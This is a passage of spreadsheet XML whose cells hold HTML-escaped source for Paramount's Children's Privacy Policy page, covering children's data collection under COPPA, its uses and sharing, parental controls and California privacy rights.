h-2.3L137.1,11.9z M36.9,28.9c-0.5,0-0.9-0.2-0.9-0.8c0-1.7,1.5-4.8,3.3-7.3c1.3-1.7,2.9-3,4.7-3l-2.2,5C40.1,26.5,38.2,28.9,36.9,28.9L36.9,28.9z M58.9,28.9c-0.5,0-0.9-0.2-0.9-0.8c0-1.7,1.5-4.8,3.3-7.3c1.3-1.7,2.9-3,4.7-3l-2.2,5C62,26.6,60.2,28.9,58.9,28.9L58.9,28.9z M97.9,19.1c-0.1,1.9-1.8,6.5-3.7,9.3c-0.8,1.1-1.5,1.4-2.1,1.4c-0.8,0-1.1-0.7-0.9-1.7c0.2-1.7,1.6-5.8,3.6-8.6c0.9-1.3,1.5-1.8,2.2-1.8S97.9,18.4,97.9,19.1L97.9,19.1z"/&gt;&lt;/svg&gt;&lt;h2&gt;Redirecting&lt;/h2&gt;&lt;p&gt;If this page does not redirect within a few seconds, please check any ad blocking extensions you may be using and try again.&lt;/p&gt;&lt;ul class="redirect-links"&gt;&lt;li&gt;&lt;a href="/en/policy"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/en/cookies"&gt;Cookie Policy&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/en/cookies"&gt;Childrens Policy&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/en/donotsell"&gt;Do Not Sell My Personal Information&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/span&gt;&lt;script&gt;window.</t>
  </si>
  <si>
    <t>RedirectDelegate.serve('childrens');&lt;/script&gt;&lt;/main&gt;&lt;/body&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en"&gt;&lt;head&gt;&lt;title&gt;Paramount Privacy | Children’s Privacy Policy&lt;/title&gt;&lt;meta content="width=device-width, initial-scale=1" name="viewport" /&gt;&lt;meta charset="UTF-8" /&gt;&lt;meta content="text/html; charset=UTF-8" http-equiv="Content-Type" /&gt;&lt;link href="/assets/img/favicon-32x32.png" rel="icon" /&gt;&lt;style class="main" type="text/css"&gt;@font-face{font-family:'Muli';font-style:normal;font-weight:400;font-display:swap;src:url(/assets/fonts/muli-ext04.woff) format("woff");unicode-range:U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB}@font-face{font-family:'Muli';font-style:normal;font-weight:400;font-display:swap;src:url(/assets/fonts/muli-ext05.woff) format("woff");unicode-range:U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF}@font-face{font-family:'Muli';font-style:normal;font-weight:400;font-display:swap;src:url(/assets/fonts/muli-lat.woff) format("woff");unicode-range:U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD}.chevron{padding-left:10px}.chevron::marker{content:"\203A";font-size:150%}h1,h2,h3,h4{font-weight:400}h1{font-size:300%;color:#1475ff}h2{font-size:180%}h2:before{content:'';display:block;position:relative;width:0;height:3em;margin-top:-3em}h3{font-size:130%}h1,h2,h3{color:#000a3c}h1.font-sm,h2.font-sm,h3.font-sm{font-size:190%}h1.font-md,h2.font-md,h3.font-md{font-size:225%}p,ul,ol{margin-bottom:1em;line-height:1.7em}p{text-align:justify}ul&gt;li{margin-bottom:0.5em;list-style-type:square}ol&gt;li{margin-bottom:0.5em}table{overflow-x:auto;width:100%;text-align:left;border-collapse:collapse}table tr td:first-of-type{text-align:left}table tr{vertical-align:top}table th,table td{padding:1em 0.25em;border:1px solid gray}table td p{text-align:left}table th{background-color:lightgray}select{color:#fff;border:1px solid #000a3c;line-height:1;outline:0;padding:0.65em 2.5em 0.55em 0.75em;border-radius:#000a3c;background-color:#000a3c}select:focus{outline:#005fcc double 5px}select:active{color:#fff;border-color:#000a3c;background-color:#000a3c}strong{font-family:Roboto, sans-serif}html,body{margin:0;padding:0;font-family:Arial, "Times New Roman", Times, serif;font-size:95%;transition:0.5s;font-display:swap}.underline{text-decoration:underline}.center{text-align:center}.container{display:grid;align-items:center}.container.grid-top{align-items:start}.container.grid-gap-sm{gap:2em}.container.grid-no-row-gap{grid-row-gap:0em}.container.two.columns{grid-template-columns:auto auto}#top{position:relative;top:-50px}body&gt;header{position:sticky;top:0;background:#000a3c;padding:1em}body&gt;header .icon{max-width:225px}body&gt;header div{text-align:right}body&gt;header div a{color:#fff;text-decoration:none;padding:0.5em;background:#1475ff;border-radius:0.5em}body&gt;header span{margin-left:10%}body&gt;main{color:#212529;min-height:calc(100vh - 155px);margin:0 3em;background-color:white}body&gt;main div.dropdown-container label div{margin-bottom:0.2em}body&gt;main div#language{text-align:right}body&gt;footer{color:#fff;background:#000a3c;padding:1em 0}body&gt;footer&gt;div{margin:0</t>
  </si>
  <si>
    <t>5em}body&gt;footer&gt;div ul{list-style-type:none;text-align:center}body&gt;footer&gt;div ul li{display:inline-block;padding:0.5em}body&gt;footer&gt;div ul li a{color:white;text-decoration:none}body&gt;footer&gt;div p{text-align:center}@media only screen and (min-width: 768px){body{font-size:110%}body&gt;main{margin:0 15%}body&gt;main div.content.shifted{margin-left:3em}body&gt;main&gt;div.content&gt;div:not(.no-shift){margin-left:3em}}@media only screen and (max-width: 767px){.container.two.columns:not(.logo){grid-template-columns:auto}body&gt;main div#language{text-align:left}}@media only screen and (max-width: 481px){.back-to-top-btn{display:none}}&lt;/style&gt;&lt;script charset="UTF-8" data-domain-script="00e3ba6a-0262-4352-99c4-1a1a67f9be9c" src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js" type="text/javascript"&gt;&lt;/script&gt;&lt;script src="//production-cmp.isgprivacy.cbsi.com/cps/redirectDelegate.js" type="text/javascript"&gt;&lt;/script&gt;&lt;script&gt;function navigatePage(page) {
  var lang = window.document.getElementById('language-selector').value;
  window. RedirectDelegate.serve(page, { language: lang });
}&lt;/script&gt;&lt;/head&gt;&lt;body&gt;&lt;header class="logo container two columns"&gt;&lt;span data-icon="logo" class="container-nVyjt3h icon icon-pnC0_PM" alt="Paramount logo"&gt;&lt;svg role="img" aria-label="Paramount logo" alt="Paramount logo" style="max-height: 38px;" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;style type="text/css"&gt;.st0{fill:#FFFFFF;}&lt;/style&gt;&lt;path class="st0" d="M41.7,9.7c0-6.3-6.7-9.4-14.7-9.4c-8.5,0-16.4,3.8-19.3,9.7c-0.8,1.6-1.2,3.3-1.2,5.1c0,1.5,0.4,3,1.2,4.3c1.2,1.8,3.4,3,6.7,3c4,0,7.1-2.2,7.1-6c0,0,0.1-1.1-1.2-1.1c-1,0-1.3,0.7-1.2,1.1c0.1,3-1.6,5.3-4.8,5.3c-3.5,0-5-3-5-6.2c0-6.6,4.9-10.9,10.1-12.8c2.4-0.9,5-1.4,7.5-1.3c5.8,0,10.6,2.2,10.6,8.2c0,5-4.2,9.3-9.2,9.6l0.2-0.7c1-3.7,2.3-7.7,4.3-10.7c0.1-0.2,0.3-0.5,0.6-0.8l-0.3-0.4c-0.4,0.3-0.9,0.6-1.3,0.9C22.2,15.2,21.9,36.3,9,36.3c-0.4,0-0.9,0-1.3-0.1C5,35.8,3.6,34,3.6,31.5c0-0.5,0.2-1.2,0.2-1.6c0-0.7-0.5-1.3-1.2-1.3c0,0,0,0,0,0H2.4c-1.1,0-1.6,0.9-1.6,2.2c-0.1,3.7,2.7,5.9,6.9,6.3c0.5,0,0.9,0.1,1.4,0.1c10,0,16.2-7.6,18.8-16.8c1.3-0.2,2.6-0.4,3.9-0.8C36.4,18.3,41.7,15.2,41.7,9.7z"/&gt;&lt;path class="st0" d="M137.1,11.9h-3.5l-0.8,1.9l-1.4,3.1h-1.6l-0.5,1.1h1.7l-2.1,4.6c-1.5,3.2-3.8,6.3-5.1,6.3c-0.3,0-0.5-0.1-0.5-0.4s0.1-0.6,0.4-1.4c0.4-1,1.1-2.4,1.6-3.4c0.7-1.5,1.9-3.8,1.9-5s-0.7-2.1-2.2-2.1c-1.6,0-3.1,1-4.4,2.4l0.9-2.1h-3.3l-2.7,6.2c-1.1,2.2-3.3,5.8-4.7,5.8c-0.3,0-0.4-0.2-0.4-0.5c0-0.3,0.1-0.5,0.2-0.8c0.1-0.3,1.7-4.1,1.7-4.1l2.9-6.7h-3.6l-2.8,6.6c-0.9,2-3.1,5.5-4.6,5.5c-0.3,0-0.5-0.2-0.5-0.4v-0.1c0-0.4,0.3-1,0.5-1.5l1.5-3.3l3.1-6.7h-3.6l-0.7,1.5c-0.5,1-1.4,2.2-2.8,2.2c-0.7,0-1-0.3-1.1-0.5c-0.2-2.3-1.6-3.5-3.8-3.5c-2.9,0-5,1.7-6.4,3.8c-0.9,1.5-1.6,3-2.1,4.7c-1.3,2.1-2.6,3.7-3.6,3.7c-0.3,0-0.4-0.1-0.4-0.5c0-0.4,0.4-1.1,0.5-1.4l2.3-4.9c0.6-1.5,1.1-2.5,1.1-3.5c0-1.1-0.7-1.8-1.9-1.8c-1.7,0-3.5,1-4.9,2.6c0-0.3,0.1-0.5,0.1-0.8c0-1.2-0.6-1.8-1.8-1.8c-1.5,0-3.1,0.9-4.6,2.6l0.9-2.3h-3.2L70,23c-1.3,2.9-3.4,5.8-4.6,5.8c-0.3,0-0.4-0.1-0.4-0.5c0-0.6,0.6-1.9,0.9-2.5l3.6-8.2c0.3-0.6-1.5-1-3.7-1c-2.3,0-4.6,1.1-6.3,2.6c-1.2,1-2.1,1.5-2.5,1.5c-0.2,0-0.3-0.1-0.3-0.3c0-0.5,1.2-1.9,1.2-3c0-0.5-0.3-0.8-0.9-0.8c-1.3,0-2.8,1.2-3.9,2.5l0.9-2.3h-3.2L48,23c-1.3,2.9-3.4,5.9-4.6,5.9c-0.3,0-0.4-0.1-0.4-0.5c0-0.6,0.6-1.9,0.9-2.6l3.6-8.2c0.3-0.6-1.5-1-3.7-1c-3.3,0-6.4,2.2-8.1,4.5c-1.9,2.4-3.1,5-3.1,7.1c0,1.7,0.8,2.8,2.6,2.8c2,0,3.6-1.6,4.5-2.7c-0.1,0.2-0.1,0.5-0.1,0.7c0,1.2,0.5,2,1.9,2c1.3,0,2.9-1.1,4.3-2.7l-1.1,2.5H48l3.4-7.7c1.1-2.5,2.4-3.8,2.7-3.8c0.1,0,0.2,0.1,0.2,0.1c0,0.3-0.5,1-0.5,1.6c0,0.6,0.4,1.1,1.3,1.1c0.7,0,1.6-0.4,2.3-0.8c-1.7,2.4-2.9,4.8-2.9,6.9c0,1.7,0.9,2.8,2.6,2.8c1.9,0,3.6-1.8,4.5-2.9c0,0.3-0.1,0.5-0.1,0.8c0,1.1,0.6,2.1,2,2.1c1.5,0,2.6-0.9,4.1-2.7l-1.1,2.5h3.5l3.2-7.3c1.4-3.2,3.3-4.9,4.3-4.9c0.2,0,0.4,0.1,0.5,0.4c0,0,0,0,0,0V19c0,0.4-0.1,0.7-0.3,1l-4.6,10.7h3.6l3.3-7.5c1.4-3.2,3-4.8,4.1-4.8c0.4,0,0.5,0.2,0.5,0.6c0,0.4-0.1,0.8-0.3,1.2L81.2,27c-0.3,0.6-0.5,1.3-0.5,2.1c0,1,0.6,1.9,2.1,1.9c2.1,0,3.6-1.6,5.4-3.9v0.5c0.1,1.9,1.2,3.5,3.9,3.5c3.2,0,5.8-2.2,7.4-5.8c0.6-1.3,1-2.6,1.1-4c0.4,0.2,0.7,0.3,1.1,0.2c0.5,0,1.1-0.1,1.5-0.4l-0.6,1.2c-0.6,1.4-1.4,2.8-1.9,4.1c-0.4,0.7-0.6,1.6-0.6,2.4c0,1.3,0.7,2.2,2.1,2.2c1.4,0,3.4-1.4,4.8-3.3h0c-0.1,0.4-0.1,0.8-0.1,1.2c0,1.1,0.3,2.1,1.8,2.1c1.7,0,3-1.2,4.3-2.8l-1.1,2.5h3.6l2.9-6.5c1.6-3.6,3.2-5.8,4.7-5.8c0.3,0,0.5,0.2,0.5,0.4V19c0,0.6-0.9,2.3-1.7,4c-0.7,1.5-1.3,2.7-1.7,3.6c-0.4,0.8-0.6,1.6-0.6,2.4c0,1.1,0.6,2,2,2c2.1,0,4.1-2,5.3-3.5c-0.3,0.7-0.4,1.5-0.4,2.2c0,2.1,1.2,3.1,3,3.1c1.2,0,2.3-0.4,3.2-1.1c1.4-0.9,2.4-2.4,3.3-3.6l-0.6-0.6c-0.9,1.2-1.8,2.4-2.8,3.1c-0.5,0.4-1.2,0.7-1.8,0.7c-0.7,0-1.2-0.4-1.2-1.3s0.4-2.2,1.1-3.9c0,0,1-2.2,1.9-4.3c0.8-1.8,1.5-3.5,1.7-3.8h2.3l0.5-1.1h-2.3L137.1,11.9z M36.9,28.9c-0.5,0-0.9-0.2-0.9-0.8c0-1.7,1.5-4.8,3.3-7.3c1.3-1.7,2.9-3,4.7-3l-2.2,5C40.1,26.5,38.2,28.9,36.9,28.9L36.9,28.9z M58.9,28.9c-0.5,0-0.9-0.2-0.9-0.8c0-1.7,1.5-4.8,3.3-7.3c1.3-1.7,2.9-3,4.7-3l-2.2,5C62,26.6,60.2,28.9,58.9,28.9L58.9,28.9z M97.9,19.1c-0.1,1.9-1.8,6.5-3.7,9.3c-0.8,1.1-1.5,1.4-2.1,1.4c-0.8,0-1.1-0.7-0.9-1.7c0.2-1.7,1.6-5.8,3.6-8.6c0.9-1.3,1.5-1.8,2.2-1.8S97.9,18.4,97.9,19.1L97.9,19.1z"/&gt;&lt;/svg&gt;&lt;/span&gt;&lt;div class="toc"&gt;&lt;a class="back-to-top-btn" href="#top" tabindex="0"&gt;Back to Top&lt;/a&gt;&lt;/div&gt;&lt;/header&gt;&lt;main&gt;&lt;div id="top"&gt;&lt;/div&gt;&lt;header class="container two columns"&gt;&lt;h1 class="font-sm"&gt;Children’s Privacy Policy&lt;/h1&gt;&lt;div class="container" id="language"&gt;&lt;div class="dropdown-container"&gt;&lt;label for="language-selector"&gt;&lt;div&gt;Language&lt;/div&gt;&lt;select aria-label="Language selection" id="language-selector" onchange="navigatePage(&amp;#39;childrens&amp;#39;)" tabindex="0"&gt;&lt;option value="ar" &gt;عربي&lt;/option&gt;&lt;option value="cs" &gt;Czech&lt;/option&gt;&lt;option value="da" &gt;Dansk&lt;/option&gt;&lt;option value="de" &gt;Deutsch&lt;/option&gt;&lt;option value="en" selected&gt;English&lt;/option&gt;&lt;option value="es" &gt;Español&lt;/option&gt;&lt;option value="es-es" &gt;Español (España)&lt;/option&gt;&lt;option value="fr" &gt;Français&lt;/option&gt;&lt;option value="el" &gt;Ελληνικά&lt;/option&gt;&lt;option value="he" &gt;עִבְרִית&lt;/option&gt;&lt;option value="hu" &gt;Hungarian&lt;/option&gt;&lt;option value="id" &gt;bahasa Indonesia&lt;/option&gt;&lt;option value="it" &gt;Italiano&lt;/option&gt;&lt;option value="ja" &gt;日本&lt;/option&gt;&lt;option value="ko" &gt;한국어&lt;/option&gt;&lt;option value="nl" &gt;Nederlands&lt;/option&gt;&lt;option value="no" &gt;Norsk bokmål&lt;/option&gt;&lt;option value="pl" &gt;Polish&lt;/option&gt;&lt;option value="br" &gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Português (Brasil)&lt;/option&gt;&lt;option value="pt-pt" &gt;Português (Portugal)&lt;/option&gt;&lt;option value="ru" &gt;русский&lt;/option&gt;&lt;option value="ro" &gt;Română&lt;/option&gt;&lt;option value="fi" &gt; Suomi&lt;/option&gt;&lt;option value="sv" &gt;Svenska&lt;/option&gt;&lt;option value="zh" &gt;汉语&lt;/option&gt;&lt;/select&gt;&lt;/label&gt;&lt;/div&gt;&lt;/div&gt;&lt;/header&gt;&lt;div class="content last-modified"&gt;&lt;p&gt;&lt;strong&gt;Last Modified:&lt;/strong&gt; &lt;span id="effective-date"&gt;March 4, 2021&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="content"&gt;&lt;p&gt;Welcome to the Paramount Children’s Privacy Policy!   This Privacy Policy will tell you about the kinds of information that Paramount Global and its affiliates (collectively " Paramount ", "we", "us", or "our") collect from children and how we use it or share it.   </t>
  </si>
  <si>
    <t xml:space="preserve">You will know that this Privacy Policy applies when you visit us on a website, mobile application, online service, or on a portion of a site or service, use any online or offline services that we operate, or attend an in-person live event or experience (together we call these our "Services") and this Privacy Policy is made available to you.&lt;/p&gt;&lt;p&gt; This Privacy Policy is in accordance with applicable global privacy laws, such as the U.S. Children's Online Privacy Protection Act (also known as COPPA) and outlines our practices regarding information collected from and about children who use our Services. It supplements and is in addition to the Paramount general audience Privacy Policy, which should be read alongside this Privacy Policy.  </t>
  </si>
  <si>
    <t>If you have questions about our privacy practices as they relate to information we collect about children, see the “Contact Us” section below.&lt;/p&gt;&lt;p&gt;If you are in the U.S., you can access a list of Paramount services that are directed to children to which this Privacy Policy applies here &lt;a href="https://www.viacomcbsprivacy.com/childrens-services/"&gt;https://www.viacomcbsprivacy.com/childrens-services&lt;/a&gt;.   If you live in another country and have questions about the Services to which this Privacy Policy applies, you can contact us at the information provided at the “Contact Us” section below.&lt;/p&gt;&lt;p&gt;&lt;strong&gt; You should always check with your parents or guardians before giving out any information about you, especially before entering information on any website  mobile application, or online service.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;If you are a Grownup using our Services – our general audience Paramount Privacy Policy, which can be viewed at &lt;a href="https://www.viacomcbsprivacy.com/policy"&gt;https://www.viacomcbsprivacy.com/policy&lt;/a&gt;, applies to our collection and processing of your data (including on the Services where this Children’s Privacy Policy is posted).</t>
  </si>
  <si>
    <t>&lt;strong&gt; We encourage families to discuss their household guidelines regarding the online sharing of Personal Information.   For more information on what you as a parent or guardian can do to control your child’s access to or use of our Services, please see the “Parental Control and Choices” section of this Privacy Policy&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;Click on each header below for more information or scroll down to read the full Privacy Policy.&lt;/p&gt;&lt;/div&gt;&lt;div class="content"&gt;&lt;div class="content no-shift"&gt;&lt;h3&gt;&lt;a href="#Mission"&gt;Our Mission to Protect Children’s Privacy&lt;/a&gt;&lt;/h3&gt;&lt;h3&gt;&lt;a href="#Information"&gt;Information We Collect &lt;/a&gt;&lt;/h3&gt;&lt;h3&gt;&lt;a href="#How"&gt;How We Use Information &amp; Why&lt;/a&gt;&lt;/h3&gt;&lt;h3&gt;&lt;a href="#Who"&gt;Who</t>
  </si>
  <si>
    <t xml:space="preserve">We Share Your Information With &amp; Why&lt;/a&gt;&lt;/h3&gt;&lt;h3&gt;&lt;a href="#Parental"&gt;Parental Control and Choices&lt;/a&gt;&lt;/h3&gt;&lt;h3&gt;&lt;a href="#Educational"&gt;Educational Services&lt;/a&gt;&lt;/h3&gt;&lt;h3&gt;&lt;a href="#Changes"&gt;Changes to this Children’s Privacy Policy&lt;/a&gt;&lt;/h3&gt;&lt;h3&gt;&lt;a href="#Contact"&gt;Contact Us&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="content"&gt;&lt;h2 id="Mission"&gt;Our Mission to Protect Children's Privacy&lt;/h2&gt;&lt;p&gt;We recognize the need to provide further privacy protections when it comes to children. Some of the Services are directed to children, while other Services or portions of them are intended for use by adults and teens.   For Services that are directed to children, we may collect, use, and disclose information about you as described in this Privacy Policy.  </t>
  </si>
  <si>
    <t>Some of this information may be considered “Personal Information” or “Personal Data” (as defined under applicable law) which is information that identifies you or your device or is reasonably associated with you.   We consider you to be a child if you are not of legal age to consent to the collection and processing of your Personal Information under applicable laws where you live.&lt;/p&gt;&lt;/div&gt;&lt;div class="content"&gt;&lt;h2 id="Information"&gt;Information We Collect&lt;/h2&gt;&lt;p&gt;Below we summarize potential instances of collection of Personal Information where our Services are directed at children.</t>
  </si>
  <si>
    <t>We also outline how and when we will provide parental notice and/or seek parental consent. &lt;/p&gt;&lt;p&gt; In any instance that we collect Personal Information from a child, we will retain that information only so long as reasonably necessary to fulfill the activity requested or allow you to continue to participate in the activity, and to ensure the security of our users and our Services, or as required by law.</t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;p &gt; In the event we discover we have collected Personal Information from or about a child in a manner inconsistent with legal requirements, we will either delete the information or immediately seek the parent’s consent for that collection.&lt;/p&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">The Personal Information that we collect generally falls within three broad categories: (a) information you provide to us, (b) information we collect automatically when you use or access our Services, and (c) information we obtain from other sources.&lt;/p&gt;&lt;div class="content no-shift"&gt;&lt;h3&gt;Information You Give to Us&lt;/h3&gt;&lt;p&gt;You can use most of the Services without actively submitting any information, but some of the Services may allow you to provide Personal Information, such as the following:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Identifiers such as name, username, phone number, email address, and mailing address.&lt;/li&gt;&lt;li&gt;Profile information such as date of birth, gender, avatar, and interests.&lt;/li&gt;&lt;li&gt; Parent or guardian contact information.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;We may also require payment information such as a credit card number.   We will ask you to get a parent or guardian to assist you with these transactions or for permission from your parent or guardian before allowing you to use a credit card number on one of our Services.&lt;/p&gt;&lt;/div&gt;&lt;div class="content no-shift"&gt;&lt;h3&gt;Information Collected About Your Computer, Phone and Other Devices&lt;/h3&gt;&lt;p&gt;We and our service providers operating on our behalf or other businesses who collect information on our Services may automatically collect or receive certain information associated with you and/or your device(s) as part of your use of our Services through device-based tracking technologies.  </t>
  </si>
  <si>
    <t>This could be information such as your IP address (a number assigned by your Internet Service Provider that can identify your device), mobile advertising ID (a resettable identifier assigned to your device by  operating system provider, such as Apple or Google), media access control (MAC) address, and identifiers associated with cookies, pixels, tags, beacons, scripts or other technology. For more information about cookies and other tracking technologies and the choices you have regarding the use of them, click &lt;a href="https://www.viacomcbsprivacy.com/cookies"&gt;https://www.viacomcbsprivacy.com/cookies&lt;/a&gt;, to view our Paramount Cookie Policy &lt;a href="https://www.viacomcbsprivacy.com/cookies"&gt;https://www.viacomcbsprivacy.com/cookies&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;&lt;div class="content no-shift"&gt;&lt;h3&gt;Websites and Data Collection of Third Parties&lt;/h3&gt;&lt;p&gt;The Services may include links to other websites or services, such as to purchase online subscriptions, tickets to a Paramount in-person live event or experience, purchase of a consumer or virtual good or service or interactive products or games that pair with third party devices, such as a voice-controlled digital assistant &lt;strong&gt;Information collected by third-party devices or on other sites and services is subject to the privacy policy and practices of the third party providing such site or service and not subject to this Privacy Policy.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Please consult the privacy policies of any third parties with which you share information in this manner to learn about the third party’s data practices.&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="content"&gt;&lt;h2 id="How"&gt;How We Use Information &amp; Why&lt;/h2&gt;&lt;p&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>We collect and use information about you for the following purposes.&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Provide, maintain, and improve the Services, as well as to develop new content and features;&lt;/li&gt;&lt;li&gt;Perform our contractual obligations;&lt;/li&gt;&lt;li&gt;Create, maintain, and service your account, if you have created one;&lt;/li&gt;&lt;li&gt;Send notifications related to your account, if you have created one;&lt;/li&gt;&lt;li&gt;Send newsletters, postcards, or messages you request;&lt;/li&gt;&lt;li&gt;Enable you to participate in interactive features of the Services;&lt;/li&gt;&lt;li&gt;Enable you to participate in sweepstakes, contests, or promotions;&lt;/li&gt;&lt;li&gt;Respond to customer service requests from you;&lt;/li&gt;&lt;li&gt;Conduct internal research and development;&lt;/li&gt;&lt;li&gt;Analyze traffic and user activities on the Services, identify popular areas or features, and optimize and personalize the Services;&lt;/li&gt;&lt;li&gt;Serve contextual advertising and limit the number of times you see an advertisement on the Services to the extent allowed by local law;&lt;/li&gt;&lt;li&gt; Debug the Services to identify and repair errors;&lt;/li&gt;&lt;li&gt;Process or fulfill orders and transactions; and&lt;/li&gt;&lt;li&gt;Protect the rights and property of Paramount and others, and comply with our legal obligations, including to detect, investigate, and prevent fraud and other illegal activities, and to enforce our agreements.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;We may send you local notifications.&lt;/strong&gt; We do not send push notifications to children without first obtaining consent from a parent or guardian, but we may use "local notifications" that are sent directly through a mobile app to your device (and do not require an internet connection).</t>
  </si>
  <si>
    <t>We may use these local notifications to notify you of new content or events within the app, among other reasons.&lt;/p&gt;&lt;p&gt;&lt;strong&gt; We will store your data only as long as needed for business purposes.&lt;/strong&gt; We store the Personal Information we collect for as long as is necessary for the purpose(s) for which we originally collected it in accordance with applicable laws.</t>
  </si>
  <si>
    <t>We may also retain Personal Information as required by law.&lt;/p&gt;&lt;/div&gt;&lt;div class="content"&gt;&lt;h2 id="Who"&gt;Who We Share Your Information With &amp; Why&lt;/h2&gt;&lt;p&gt;We will not share the information we collect other than as follows: &lt;/p&gt;&lt;p&gt;&lt;strong&gt;We may share information within the Paramount family of companies.&lt;/strong&gt;  Where permitted by law, we may share information we collect about you with the Paramount companies for the purposes described in the "How We Use Information &amp; Why" section above. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We may share your information in connection with a corporate transaction.&lt;/strong&gt;  We may disclose or transfer your information as part of, or during negotiations for, any purchase, sale, lease, merger, or any other type of acquisition, disposal, or financing involving our brands.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;We will share information with third parties who perform Services on our behalf.&lt;/strong&gt;   We share information with unaffiliated companies or individuals we hire or work with that provide us with professional advice, business support, or perform services on our behalf, including customer support, payment processors, or others who assist us in fulfilling orders or transactions, web hosting, information technology, payment processing, event providers, direct mail and email distribution, contest, sweepstakes and promotion administration, and analytics services (“Service Providers”). These Service Providers are allowed to use your information to help us provide our Services and not for any other purpose.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;We may share information with our business partners.&lt;/strong&gt;  Such business partners may include sweepstakes or other partners, including those who are working with us on co-branded Services or events.   Our business partners use the information we give them as described in their privacy policies.  </t>
  </si>
  <si>
    <t>When we share your information with a business partner, we will let you know. &lt;/p&gt;&lt;p&gt;&lt;strong&gt; We may share your information with sponsors and other partners for contests, giveaways and sweepstakes.&lt;/strong&gt;   We share this information to verify your entry into and eligibility to participate in contests, giveaways, or sweepstakes, and to inform you if you’ve won.</t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;p&gt;&lt;strong&gt;We will share your information with your consent or if you ask us to.&lt;/strong&gt;   We share your information with third parties if you provide your consent or when you ask us to do so and if it is allowed under applicable law. For example, if you ask us to share your information in order for you to participate in an interactive service that is operated by a third party, we will share that information as requested and allowed.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;We may share information if we think we have to in order to comply with the law or to protect ourselves.&lt;/strong&gt;  For example, we will share information when it’s necessary for us to comply with applicable law or legal process, to respond to legal claims, or to protect our rights, property or personal safety of our users, employees, or the public.&lt;/p&gt;&lt;p&gt;&lt;strong&gt; We may share your information for reasons not described in this policy.&lt;/strong&gt;</t>
  </si>
  <si>
    <t>We will tell you before we do this.&lt;/p&gt;&lt;/div&gt;&lt;div class="content"&gt;&lt;h2 id="Parental"&gt;Parental Control and Choices&lt;/h2&gt;&lt;p&gt;If we allow children to create an account or otherwise engage with us over time, we will obtain parental consent prior to the collection of their Personal Information. If you are a parent, you can refuse to permit us to collect Personal Information from your child and can request that we delete from our records the Personal Information we have collected. Please keep in mind that a request to delete records may lead to a termination of an account, membership, or other Services.&lt;/p&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>If you have any questions or concerns about our approach to children's privacy, you, as a parent, want to access the data of your child, or request the deletion of your child's data, please submit a request via our Privacy Right Manager’s  parents’ webform &lt;a href="https://www.viacomcbsprivacy.com/parentalrights"&gt;https://www.viacomcbsprivacy.com/parentalrights&lt;/a&gt;. For more information about your choices and rights, visit our Paramount general audience Privacy Policy &lt;a href="https://www.viacomcbsprivacy.com/policy"&gt;https://www.viacomcbsprivacy.com/policy&lt;/a&gt;.&lt;/p&gt;&lt;div class="content no-shift"&gt;&lt;h3&gt;Your California Rights&lt;/h3&gt;&lt;p&gt;Under the California Consumer Privacy Protection Act (CCPA), California residents have the right to request access to or deletion of their Personal Information, to request additional details about our information practices, and to not be discriminated against for exercising their rights. To view the full CCPA Privacy Notice, please visit the Paramount general audience Privacy Policy &lt;a href="https://www.viacomcbsprivacy.com/policy"&gt;https://www.viacomcbsprivacy.com/policy&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;To exercise your right to access, edit or delete Personal Information we have collected about you, or if you need further assistance regarding your rights, please submit a request through our Paramount Privacy Rights Manager &lt;a href="https://www.viacomcbsprivacy.com/managemyrights"&gt;https://www.viacomcbsprivacy.com/managemyrights&lt;/a&gt;, and we will consider your request in accordance with applicable laws.</t>
  </si>
  <si>
    <t>Note that even if we honor your request to delete your Personal Information, we may retain certain Personal Information as required or permitted by law.&lt;/p&gt;&lt;p&gt; We do not sell Personal Information collected by or from any Service or portion of a Service that is directed to children or where we know that the user is a child or a teen under 16. For the portions of our Services that are directed to audiences older than 16, we do not sell identifying information such as name, email address, phone number, or postal address, but we may share identifiers such as cookies and the advertising identifier associated with your mobile device with our advertising partners, and those partners may use and share those identifiers to show ads that are targeted to your interests.</t>
  </si>
  <si>
